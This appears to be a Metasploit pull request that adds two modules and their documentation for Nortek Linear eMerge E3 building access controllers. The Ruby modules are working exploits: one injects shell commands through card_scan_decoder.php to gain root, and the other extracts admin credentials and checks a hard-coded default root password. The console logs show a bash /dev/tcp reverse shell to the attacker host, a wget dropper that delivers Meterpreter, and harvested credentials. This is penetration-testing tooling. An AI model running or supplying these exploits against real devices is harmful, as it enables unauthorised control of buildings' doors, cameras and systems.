### PR TITLE
Credentials disclosure in Nortek Linear eMerge Access Controller [CVE-2019-7252]

### DIFF
--- a/documentation/modules/auxiliary/admin/http/linear_emerge_cred_disclosure_cve_2019_7252.md
+++ b/documentation/modules/auxiliary/admin/http/linear_emerge_cred_disclosure_cve_2019_7252.md
@@ -1,0 +1,93 @@
+## Vulnerable Application
+
+Nortek Security & Control, LLC (NSC) is a leader in wireless security, home automation and personal safety systems and devices.
+The eMerge E3-Series is part of Linear’s access control platform, that delivers entry-level access control to buildings.
+It is a web based application where the HTTP web interface is typically exposed to the public internet.
+
+Building Automation and Access Control systems are at the heart of many critical infrastructures, and their security is vital.
+Executing attacks on these systems may enable unauthenticated attackers to access and manipulate doors, elevators, air-conditioning systems,
+cameras, boilers, lights, safety alarm systems in an entire building.
+
+Default credentials exist within a vulnerable configuration on the Linear eMerge E3 access controller that can be easily leveraged
+to gain privileged access to the system.
+
+The first credential vulnerability is based on a default root password that is a stored in the `/etc/passwd`.
+This can be used to escalate to root privileges using the RCE vulnerability CVE-2019-7256 or use these credentials in combination
+with ssh (if enabled) to get root access to the access controller.
+
+The second credential vulnerability allows an unauthenticated malicious actor to obtain the admin web credentials admin from the
+spider database that is accessible and readable for the world on the access controller.
+With this access, the malicious actor is able to control the Linear eMerge E3 access controller platform, the access to building,
+its cameras and the authority to manage the access rights of users.
+
+This issue affects all Linear eMerge E3 versions up to and including `1.00-06`.
+
+Installing a vulnerable test bed requires a Linear eMerge E3 access controller with the vulnerable software loaded.
+
+This module has been tested against a Linear eMerge access controller with the specifications listed below:
+
+* Nortek Linear eMerge E3 access controller
+* Firmware < `v1.00-03`
+
+## Verification Steps
+
+1. `use auxiliary/admin/http/linear_emerge_cred_disclosure_cve_2019_7252`
+1. `set RHOSTS <TARGET HOSTS>`
+1. `run`
+1. You should be able to check if the default root password `davestyle` is available and retrieve the admin web credentials.
+
+## Options
+`STORE_CRED <true/false>` which allows you to store the leaked credentials in the creds database of Metasploit
+
+## Scenarios
+
+### Nortek Linear eMerge E3 access controller credential disclosure
+
+```
+msf6 > auxiliary/admin/http/linear_emerge_cred_disclosure_cve_2019_7252
+msf6 exploit(linux/http/linear_emerge_unauth_rce_cve_2019_7256) > options
+
+Module options (auxiliary/admin/http/linear_emerge_cred_disclosure_cve_2019_7252):
+
+   Name        Current Setting  Required  Description
+   ----        ---------------  --------  -----------
+   Proxies                      no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS                       yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
+   RPORT       80               yes       The target port (TCP)
+   SSL         false            no        Negotiate SSL/TLS for outgoing connections
+   STORE_CRED  true             no        Store credentials into the database.
+   TARGETURI   /                yes       Linear eMerge E3 path
+   VHOST                        no        HTTP server virtual host
+
+
+View the full module info with the info, or info -d command.
+
+msf6 auxiliary(admin/http/linear_emerge_cred_disclosure_cve_2019_7252) > set rhosts 192.168.100.180
+rhosts => 192.168.100.180
+msf6 auxiliary(admin/http/linear_emerge_cred_disclosure_cve_2019_7252) > run
+[*] Running module against 192.168.100.180
+
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] Checking if 192.168.100.180:80 can be exploited.
+[*] Performing command injection test issuing a sleep command of 5 seconds.
+[*] Elapsed time: 5.813634401994932 seconds.
+[+] The target is vulnerable. Successfully tested command injection.
+[*] Retrieving admin web credentials...
+[+] Admin web credentials found: admin:cuckoo
+[*] Credentials admin:cuckoo are added to the database...
+[*] Checking for default root system credentials...
+[+] Default root system credentials found: root:davestyle
+[*] Credentials root:davestyle are added to the database...
+[*] Auxiliary module execution completed
+msf6 auxiliary(admin/http/linear_emerge_cred_disclosure_cve_2019_7252) > creds 192.168.100.180
+Credentials
+===========
+
+host             origin           service        public  private    realm  private_type  JtR Format
+----             ------           -------        ------  -------    -----  ------------  ----------
+192.168.100.180  192.168.100.180  80/tcp (http)  root    davestyle         Password
+192.168.100.180  192.168.100.180  80/tcp (http)  admin   cuckoo            Password
+```
+
+## Limitations
+No limitations.

--- a/documentation/modules/auxiliary/admin/http/linear_emerge_cred_disclosure_cve_2019_7252.md
+++ b/documentation/modules/auxiliary/admin/http/linear_emerge_cred_disclosure_cve_2019_7252.md
@@ -11,7 +11,7 @@ cameras, boilers, lights, safety alarm systems in an entire building.
 Default credentials exist within a vulnerable configuration on the Linear eMerge E3 access controller that can be easily leveraged
 to gain privileged access to the system.
 
-The first credential vulnerability is based on a default root password that is a stored in the `/etc/passwd`.
+The first credential vulnerability is based on a default root password that is stored in `/etc/passwd`.
 This can be used to escalate to root privileges using the RCE vulnerability CVE-2019-7256 or use these credentials in combination
 with ssh (if enabled) to get root access to the access controller.
 
@@ -44,8 +44,8 @@ This module has been tested against a Linear eMerge access controller with the s
 ### Nortek Linear eMerge E3 access controller credential disclosure
 
 ```
-msf6 > auxiliary/admin/http/linear_emerge_cred_disclosure_cve_2019_7252
-msf6 exploit(linux/http/linear_emerge_unauth_rce_cve_2019_7256) > options
+msf6 > use auxiliary/admin/http/linear_emerge_cred_disclosure_cve_2019_7252
+msf6 auxiliary(admin/http/linear_emerge_cred_disclosure_cve_2019_7252) > options
 
 Module options (auxiliary/admin/http/linear_emerge_cred_disclosure_cve_2019_7252):
 

--- a/documentation/modules/exploit/linux/http/linear_emerge_unauth_rce_cve_2019_7256.md
+++ b/documentation/modules/exploit/linux/http/linear_emerge_unauth_rce_cve_2019_7256.md
@@ -1,0 +1,188 @@
+## Vulnerable Application
+
+Nortek Security & Control, LLC (NSC) is a leader in wireless security, home automation and personal safety systems and devices.
+The eMerge E3-Series is part of Linear’s access control platform, that delivers entry-level access control to buildings.
+It is a web based application where the HTTP web interface is typically exposed to the public internet.
+
+The Linear eMerge E3 versions `1.00-06` and below are vulnerable to an unauthenticated command injection remote root exploit
+that leverages card_scan_decoder.php.
+This can be exploited to inject and execute arbitrary shell commands as the root user through the `No` and `door` HTTP GET parameter.
+A successful exploit could allow the attacker to execute arbitrary commands on the underlying operating system with the root privileges.
+
+Building Automation and Access Control systems are at the heart of many critical infrastructures, and their security is vital.
+Executing attacks on these systems may enable unauthenticated attackers to access and manipulate doors, elevators, air-conditioning systems,
+cameras, boilers, lights, safety alarm systems in an entire building.
+
+This issue affects all Linear eMerge E3 versions up to and including `1.00-06`.
+
+Installing a vulnerable test bed requires a Linear eMerge E3 access controller with the vulnerable software loaded.
+
+This module has been tested against a Linear eMerge access controller with the specifications listed below:
+
+* Nortek Linear eMerge E3 access controller
+* Firmware < `v1.00-06`
+
+## Verification Steps
+
+1. `use exploit/linux/http/linear_emerge_unauth_rce_cve_2019_7256`
+1. `set RHOSTS <TARGET HOSTS>`
+1. `set RPORT <port>`
+1. `set LHOST <attacker host ip>`
+1. `set LPORT <attacker host port>`
+1. `set TARGET <0-Unix command or 1-Linux Dropper>`
+1. `exploit`
+1. You should get a `bash` shell or `meterpreter` session depending on the target and payload settings.
+
+## Options
+No specific options.
+
+## Scenarios
+
+### Nortek Linear eMerge E3 access controller bash reverse shell
+
+```
+msf6 > use exploit/linux/http/linear_emerge_unauth_rce_cve_2019_7256
+[*] Using configured payload cmd/unix/reverse_bash
+msf6 exploit(linux/http/linear_emerge_unauth_rce_cve_2019_7256) > options
+
+Module options (exploit/linux/http/linear_emerge_unauth_rce_cve_2019_7256):
+
+   Name     Current Setting  Required  Description
+   ----     ---------------  --------  -----------
+   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS                    yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
+   RPORT    80               yes       The target port (TCP)
+   SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine
+                                       or 0.0.0.0 to listen on all addresses.
+   SRVPORT  8080             yes       The local port to listen on.
+   SSL      false            no        Negotiate SSL/TLS for outgoing connections
+   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
+   URIPATH                   no        The URI to use for this exploit (default is random)
+   VHOST                     no        HTTP server virtual host
+
+
+Payload options (cmd/unix/reverse_bash):
+
+   Name   Current Setting  Required  Description
+   ----   ---------------  --------  -----------
+   LHOST                   yes       The listen address (an interface may be specified)
+   LPORT  4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Unix Command
+
+
+View the full module info with the info, or info -d command.
+
+msf6 exploit(linux/http/linear_emerge_unauth_rce_cve_2019_7256) > set rhosts 192.168.100.180
+rhosts => 192.168.100.180
+msf6 exploit(linux/http/linear_emerge_unauth_rce_cve_2019_7256) > set lhost 192.168.100.7
+lhost => 192.168.100.7
+msf6 exploit(linux/http/linear_emerge_unauth_rce_cve_2019_7256) > set lport 4444
+lport => 4444
+msf6 exploit(linux/http/linear_emerge_unauth_rce_cve_2019_7256) > set target 0
+target => 0
+msf6 exploit(linux/http/linear_emerge_unauth_rce_cve_2019_7256) > exploit
+
+[*] Started reverse TCP handler on 192.168.100.7:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] Checking if 192.168.100.180:80 can be exploited.
+[*] Performing command injection test issuing a sleep command of 2 seconds.
+[*] Elapsed time: 3.1638134399981936 seconds.
+[+] The target is vulnerable. Successfully tested command injection.
+[*] Executing Unix Command with bash -c '0<&179-;exec 179<>/dev/tcp/192.168.100.7/4444;sh <&179 >&179 2>&179'
+[*] Command shell session 1 opened (127.0.0.1:4444 -> 127.0.0.1:54274) at 2022-12-01 18:51:54 +0000
+
+uname -a
+Linux cuckoo 3.14.54 #1 SMP PREEMPT Thu Dec 6 19:08:58 PST 2018 armv7l GNU/Linux
+whoami
+root
+exit
+```
+
+### Nortek Linear eMerge E3 access controller meterpreter session
+
+```
+msf6 > use exploit/linux/http/linear_emerge_unauth_rce_cve_2019_7256
+[*] Using configured payload linux/armle/meterpreter_reverse_tcp
+msf6 exploit(linux/http/linear_emerge_unauth_rce_cve_2019_7256) > options
+
+Module options (exploit/linux/http/linear_emerge_unauth_rce_cve_2019_7256):
+
+   Name     Current Setting  Required  Description
+   ----     ---------------  --------  -----------
+   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS                    yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
+   RPORT    80               yes       The target port (TCP)
+   SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine
+                                       or 0.0.0.0 to listen on all addresses.
+   SRVPORT  8080             yes       The local port to listen on.
+   SSL      false            no        Negotiate SSL/TLS for outgoing connections
+   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
+   URIPATH                   no        The URI to use for this exploit (default is random)
+   VHOST                     no        HTTP server virtual host
+
+
+Payload options (linux/armle/meterpreter_reverse_tcp):
+
+   Name   Current Setting  Required  Description
+   ----   ---------------  --------  -----------
+   LHOST                   yes       The listen address (an interface may be specified)
+   LPORT  4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   1   Linux Dropper
+
+
+View the full module info with the info, or info -d command.
+
+msf6 exploit(linux/http/linear_emerge_unauth_rce_cve_2019_7256) > set rhosts 192.168.100.180
+rhosts => 192.168.100.180
+msf6 exploit(linux/http/linear_emerge_unauth_rce_cve_2019_7256) > set lhost 192.168.100.7
+lhost => 192.168.100.7
+msf6 exploit(linux/http/linear_emerge_unauth_rce_cve_2019_7256) > set lport 4444
+lport => 4444
+msf6 exploit(linux/http/linear_emerge_unauth_rce_cve_2019_7256) > set target 1
+target => 1
+msf6 exploit(linux/http/linear_emerge_unauth_rce_cve_2019_7256) > exploit
+
+[*] Started reverse TCP handler on 192.168.100.7:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] Checking if 192.168.100.180:80 can be exploited.
+[*] Performing command injection test issuing a sleep command of 2 seconds.
+[*] Elapsed time: 3.177188547007972 seconds.
+[+] The target is vulnerable. Successfully tested command injection.
+[*] Executing Linux Dropper
+[*] Using URL: http://0.0.0.0:8080/n6tUft9RrS
+[*] Client 127.0.0.1 (Wget) requested /n6tUft9RrS
+[*] Sending payload to 127.0.0.1 (Wget)
+[*] Meterpreter session 2 opened (127.0.0.1:4444 -> 127.0.0.1:49448) at 2022-12-01 18:50:26 +0000
+[*] Command Stager progress - 100.00% done (125/125 bytes)
+[*] Server stopped.
+
+meterpreter > sysinfo
+Computer     : 192.168.100.180
+OS           :  (Linux 3.14.54)
+Architecture : armv7l
+BuildTuple   : armv5l-linux-musleabi
+Meterpreter  : armle/linux
+meterpreter > getuid
+Server username: root
+```
+
+## Limitations
+Staged payloads like `linux/armle/meterpreter/reverse_tcp` or `linux/armle/shell/reverse_tcp` do not work.
+Manually tested these payloads with `msfvenom`, but they produce segmentation faults when executed on the target.
+However stageless payloads such as `linux/armle/meterpreter_reverse_tcp` and `linux/armle/shell_reverse_tcp` are working.
+
+Due to the limitations of restricted `busybox` command implementation on the Linear eMerge E3 Access Controller, only a
+few unix command payloads will work such as `cmd/unix/reverse_bash` or `cmd/unix/reverse` (telnet).
+

--- a/documentation/modules/exploit/linux/http/linear_emerge_unauth_rce_cve_2019_7256.md
+++ b/documentation/modules/exploit/linux/http/linear_emerge_unauth_rce_cve_2019_7256.md
@@ -161,7 +161,7 @@ msf6 exploit(linux/http/linear_emerge_unauth_rce_cve_2019_7256) > exploit
 [*] Elapsed time: 3.177188547007972 seconds.
 [+] The target is vulnerable. Successfully tested command injection.
 [*] Executing Linux Dropper
-[*] Using URL: http://0.0.0.0:8080/n6tUft9RrS
+[*] Using URL: http://192.168.100.7:8080/n6tUft9RrS
 [*] Client 127.0.0.1 (Wget) requested /n6tUft9RrS
 [*] Sending payload to 127.0.0.1 (Wget)
 [*] Meterpreter session 2 opened (127.0.0.1:4444 -> 127.0.0.1:49448) at 2022-12-01 18:50:26 +0000

--- a/modules/auxiliary/admin/http/linear_emerge_cred_disclosure_cve_2019_7252.rb
+++ b/modules/auxiliary/admin/http/linear_emerge_cred_disclosure_cve_2019_7252.rb
@@ -1,0 +1,159 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'rex/stopwatch'
+
+class MetasploitModule < Msf::Auxiliary
+
+  include Msf::Auxiliary::Report
+  include Msf::Exploit::Remote::HttpClient
+  prepend Msf::Exploit::Remote::AutoCheck
+
+  # default root credentials on the Linear eMerge E3 access controller
+  ROOT_ID = 'root'.freeze
+  ROOT_PWD = 'davestyle'.freeze
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Linear eMerge E3 Access Controller Credentials Disclosure',
+        'Description' => %q{
+          This module exploits a vulnerability in the Linear eMerge
+          E3 Access Controller that allows an unauthenticated attacker to retrieve the admin credentials.
+          The admin credentials provide access to the admin dashboard of Linear eMerge E3-Series devices,
+          which controls the access to the entire building doors, cameras, elevator, etc... and
+          provide access information about employees who can access the building.
+          It will allow the attacker to take control of the entire building.
+          Next this module will also check if the default root credentials on the system are still set.
+          The issue is triggered by an unsanitized exec() PHP function allowing arbitrary command execution.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'Gjoko Krstic <gjoko[at]applied-risk.com>', # Discovery, Exploit
+          'h00die-gr3y <h00die.gr3y[at]gmail.com>' # MSF Module contributor
+        ],
+        'References' => [
+          [ 'CVE', '2019-7252'],
+          [ 'CVE', '2019-7256'],
+          [ 'URL', 'https://attackerkb.com/topics/v1NMUqh8F2/cve-2019-7252'],
+          [ 'URL', 'https://applied-risk.com/resources/ar-2019-005' ],
+          [ 'URL', 'https://www.nortekcontrol.com' ],
+          [ 'PACKETSTORM', '155256']
+        ],
+        'DisclosureDate' => '2019-10-29',
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
+        }
+      )
+    )
+
+    register_options(
+      [
+        Opt::RPORT(80),
+        OptString.new('TARGETURI', [true, 'Linear eMerge E3 path', '/']),
+        OptBool.new('STORE_CRED', [false, 'Store credentials into the database.', true])
+      ]
+    )
+  end
+
+  def report_creds(user, pwd)
+    credential_data = {
+      module_fullname: fullname,
+      username: user,
+      private_data: pwd,
+      private_type: :password,
+      workspace_id: myworkspace_id,
+      status: Metasploit::Model::Login::Status::UNTRIED
+    }.merge(service_details)
+
+    cred_res = create_credential_and_login(credential_data)
+    unless cred_res.nil?
+      print_status("Credentials #{user}:#{pwd} are added to the database...")
+    end
+  end
+
+  def execute_command(cmd, _opts = {})
+    random_no = rand(30..100)
+    return send_request_cgi({
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, 'card_scan_decoder.php'),
+      'vars_get' =>
+        {
+          'No' => random_no,
+          'door' => "`#{cmd}`"
+        }
+    })
+  rescue StandardError => e
+    elog("#{peer} - Communication error occurred: #{e.message}", error: e)
+    fail_with(Failure::Unknown, "Communication error occurred: #{e.message}")
+  end
+
+  # Checking if the target is vulnerable by executing a randomized sleep to test the remote code execution
+  def check
+    print_status("Checking if #{peer} can be exploited.")
+    sleep_time = rand(2..6)
+    print_status("Performing command injection test issuing a sleep command of #{sleep_time} seconds.")
+    res, elapsed_time = Rex::Stopwatch.elapsed_time do
+      execute_command("sleep #{sleep_time}")
+    end
+
+    return Exploit::CheckCode::Unknown('No response received from the target!') unless res
+
+    print_status("Elapsed time: #{elapsed_time} seconds.")
+    return Exploit::CheckCode::Safe('Failed to test command injection.') unless elapsed_time >= sleep_time
+
+    Exploit::CheckCode::Vulnerable('Successfully tested command injection.')
+  end
+
+  def run
+    # get the admin web credentials...
+    @random_filename = "#{Rex::Text.rand_text_alpha(8..16)}.txt"
+    print_status('Retrieving admin web credentials...')
+    cmd = 'grep "Controller" /tmp/SpiderDB/Spider.db|cut -f 5,6 -d ","|grep ID > ' + @random_filename.to_s
+    execute_command(cmd)
+    res = send_request_cgi({
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, @random_filename)
+    })
+    if res.body.empty?
+      print_status('Could not retrieve the admin web credentials. You might want to try the default admin:admin.')
+    else
+      creds = res.body.scan(/'([^']*)'/).uniq
+      creds[1..].each do |pwd|
+        print_good("Admin web credentials found: #{creds[0].join}:#{pwd.join}")
+        if datastore['STORE_CRED'] == true
+          report_creds(creds[0].join, pwd.join)
+        end
+      end
+    end
+    # cleaning up...
+    cmd = "rm #{@random_filename}"
+    execute_command(cmd)
+
+    # checking the default root credentials...
+    @random_filename = "#{Rex::Text.rand_text_alpha(8..16)}.txt"
+    print_status('Checking for default root system credentials...')
+    cmd = 'echo ' + ROOT_PWD.to_s + '|su -c "whoami > /spider/web/webroot/' + "#{@random_filename}\""
+    execute_command(cmd)
+    res = send_request_cgi({
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, @random_filename)
+    })
+    if res.body.chomp == ROOT_ID
+      print_good("Default root system credentials found: #{ROOT_ID}:#{ROOT_PWD}")
+      if datastore['STORE_CRED'] == true
+        report_creds(ROOT_ID, ROOT_PWD)
+      end
+    else
+      print_status('No default root system credentials found.')
+    end
+    # cleaning up...
+    cmd = "rm #{@random_filename}"
+    execute_command(cmd)
+  end
+end

--- a/modules/exploits/linux/http/linear_emerge_unauth_rce_cve_2019_7256.rb
+++ b/modules/exploits/linux/http/linear_emerge_unauth_rce_cve_2019_7256.rb
@@ -1,0 +1,125 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'rex/stopwatch'
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::CmdStager
+  prepend Msf::Exploit::Remote::AutoCheck
+
+  # Default root password on a Linear eMerge E3 access controller
+  ROOT_PWD = 'davestyle'.freeze
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Linear eMerge E3 Access Controller Command Injection',
+        'Description' => %q{
+          This module exploits a command injection vulnerability in the Linear eMerge
+          E3 Access Controller. The issue is triggered by an unsanitized exec() PHP
+          function allowing arbitrary command execution with root privileges.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'Gjoko Krstic <gjoko[at]applied-risk.com>', # Discovery
+          'h00die-gr3y <h00die.gr3y[at]gmail.com>' # MSF Module contributor
+        ],
+        'References' => [
+          [ 'CVE', '2019-7256'],
+          [ 'URL', 'https://applied-risk.com/resources/ar-2019-005' ],
+          [ 'URL', 'https://www.nortekcontrol.com' ],
+          [ 'PACKETSTORM', '155256']
+        ],
+        'DisclosureDate' => '2019-10-29',
+        'Platform' => ['unix', 'linux'],
+        'Arch' => [ARCH_CMD, ARCH_ARMLE],
+        'Privileged' => false,
+        'Targets' => [
+          [
+            'Unix Command',
+            {
+              'Platform' => 'unix',
+              'Arch' => ARCH_CMD,
+              'Type' => :unix_cmd,
+              'DefaultOptions' => {
+                'PAYLOAD' => 'cmd/unix/reverse_bash'
+              }
+            }
+          ],
+          [
+            'Linux Dropper',
+            {
+              'Platform' => 'linux',
+              'Arch' => [ARCH_ARMLE],
+              'Type' => :linux_dropper,
+              'CmdStagerFlavor' => [ 'wget', 'printf', 'echo' ],
+              'DefaultOptions' => {
+                'PAYLOAD' => 'linux/armle/meterpreter_reverse_tcp'
+              }
+            }
+          ]
+        ],
+        'DefaultTarget' => 0,
+        'DefaultOptions' => {
+          'RPORT' => 80,
+          'SSL' => false
+        },
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
+        }
+      )
+    )
+  end
+
+  def execute_command(cmd, _opts = {})
+    random_no = rand(30..100)
+    return send_request_cgi({
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, 'card_scan_decoder.php'),
+      'vars_get' =>
+        {
+          'No' => random_no,
+          'door' => "`echo #{ROOT_PWD}|su -c \"#{cmd}\"`"
+        }
+    })
+  rescue StandardError => e
+    elog("#{peer} - Communication error occurred: #{e.message}", error: e)
+    fail_with(Failure::Unknown, "Communication error occurred: #{e.message}")
+  end
+
+  # Checking if the target is vulnerable by executing a randomized sleep to test the remote code execution
+  def check
+    print_status("Checking if #{peer} can be exploited.")
+    sleep_time = rand(2..6)
+    print_status("Performing command injection test issuing a sleep command of #{sleep_time} seconds.")
+    res, elapsed_time = Rex::Stopwatch.elapsed_time do
+      execute_command("sleep #{sleep_time}")
+    end
+
+    return CheckCode::Unknown('No response received from the target!') unless res
+
+    print_status("Elapsed time: #{elapsed_time} seconds.")
+    return CheckCode::Safe('Failed to test command injection.') unless elapsed_time >= sleep_time
+
+    CheckCode::Vulnerable('Successfully tested command injection.')
+  end
+
+  def exploit
+    case target['Type']
+    when :unix_cmd
+      print_status("Executing #{target.name} with #{payload.encoded}")
+      execute_command(payload.encoded)
+    when :linux_dropper
+      print_status("Executing #{target.name}")
+      execute_cmdstager(linemax: 262144)
+    end
+  end
+end

--- a/modules/exploits/linux/http/linear_emerge_unauth_rce_cve_2019_7256.rb
+++ b/modules/exploits/linux/http/linear_emerge_unauth_rce_cve_2019_7256.rb
@@ -34,6 +34,7 @@ class MetasploitModule < Msf::Exploit::Remote
           [ 'CVE', '2019-7256'],
           [ 'URL', 'https://applied-risk.com/resources/ar-2019-005' ],
           [ 'URL', 'https://www.nortekcontrol.com' ],
+          [ 'URL', 'https://attackerkb.com/topics/8WUJkci8N4/cve-2019-7256' ],
           [ 'PACKETSTORM', '155256']
         ],
         'DisclosureDate' => '2019-10-29',


### PR DESCRIPTION
Nortek Security & Control, LLC (NSC) is a leader in wireless security, home automation and personal safety systems and devices. The eMerge E3-Series is part of Linear’s access control platform, that delivers entry-level access control to buildings.
It is a web based application where the HTTP web interface is typically exposed to the public internet.

Building Automation and Access Control systems are at the heart of many critical infrastructures, and their security is vital.
Executing attacks on these systems may enable unauthenticated attackers to access and manipulate doors, elevators, air-conditioning systems, cameras, boilers, lights, safety alarm systems in an entire building.

Default credentials exist within a vulnerable configuration on the Linear eMerge E3 access controller that can be easily leveraged to gain privileged access to the system.

The first credential vulnerability is based on a default root password that is stored in `/etc/passwd`.
This can be used to escalate to root privileges using the RCE vulnerability CVE-2019-7256 or use these credentials in combination with ssh (if enabled) to get root access to the access controller.

The second credential vulnerability allows an unauthenticated malicious actor to obtain the admin web credentials admin from the spider database that is accessible and readable for the world on the access controller.
With this access, the malicious actor is able to control the Linear eMerge E3 access controller platform, the access to building, its cameras and the authority to manage the access rights of users.

This issue affects all Linear eMerge E3 versions up to and including `1.00-06`.

Installing a vulnerable test bed requires a Linear eMerge E3 access controller with the vulnerable software loaded.

This module has been tested against a Linear eMerge E3 access controller with the specifications listed below:

* Nortek Linear eMerge E3 access controller
* Firmware < `v1.00-03`

- [ ] Start `msfconsole`
- [ ] `use auxiliary/admin/http/linear_emerge_cred_disclosure_cve_2019_7252`
- [ ] `set RHOSTS <TARGET HOSTS>`
- [ ] `run`
- [ ] You should be able to check if the default root password `davestyle` is available and retrieve the admin web credentials.

## Options
`STORE_CRED <true/false>` which allows you to store the leaked credentials in the creds database of Metasploit

## Scenarios

### Nortek Linear eMerge E3 access controller credential disclosure

```
msf6 > use auxiliary/admin/http/linear_emerge_cred_disclosure_cve_2019_7252
msf6 auxiliary(admin/http/linear_emerge_cred_disclosure_cve_2019_7252) > options

Module options (auxiliary/admin/http/linear_emerge_cred_disclosure_cve_2019_7252):

   Name        Current Setting  Required  Description
   ----        ---------------  --------  -----------
   Proxies                      no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                       yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
   RPORT       80               yes       The target port (TCP)
   SSL         false            no        Negotiate SSL/TLS for outgoing connections
   STORE_CRED  true             no        Store credentials into the database.
   TARGETURI   /                yes       Linear eMerge E3 path
   VHOST                        no        HTTP server virtual host


View the full module info with the info, or info -d command.

msf6 auxiliary(admin/http/linear_emerge_cred_disclosure_cve_2019_7252) > set rhosts 192.168.100.180
rhosts => 192.168.100.180
msf6 auxiliary(admin/http/linear_emerge_cred_disclosure_cve_2019_7252) > run
[*] Running module against 192.168.100.180

[*] Running automatic check ("set AutoCheck false" to disable)
[*] Checking if 192.168.100.180:80 can be exploited.
[*] Performing command injection test issuing a sleep command of 5 seconds.
[*] Elapsed time: 5.813634401994932 seconds.
[+] The target is vulnerable. Successfully tested command injection.
[*] Retrieving admin web credentials...
[+] Admin web credentials found: admin:cuckoo
[*] Credentials admin:cuckoo are added to the database...
[*] Checking for default root system credentials...
[+] Default root system credentials found: root:davestyle
[*] Credentials root:davestyle are added to the database...
[*] Auxiliary module execution completed
msf6 auxiliary(admin/http/linear_emerge_cred_disclosure_cve_2019_7252) > creds 192.168.100.180
Credentials
===========

host             origin           service        public  private    realm  private_type  JtR Format
----             ------           -------        ------  -------    -----  ------------  ----------
192.168.100.180  192.168.100.180  80/tcp (http)  root    davestyle         Password
192.168.100.180  192.168.100.180  80/tcp (http)  admin   cuckoo            Password
```

## Limitations
No limitations.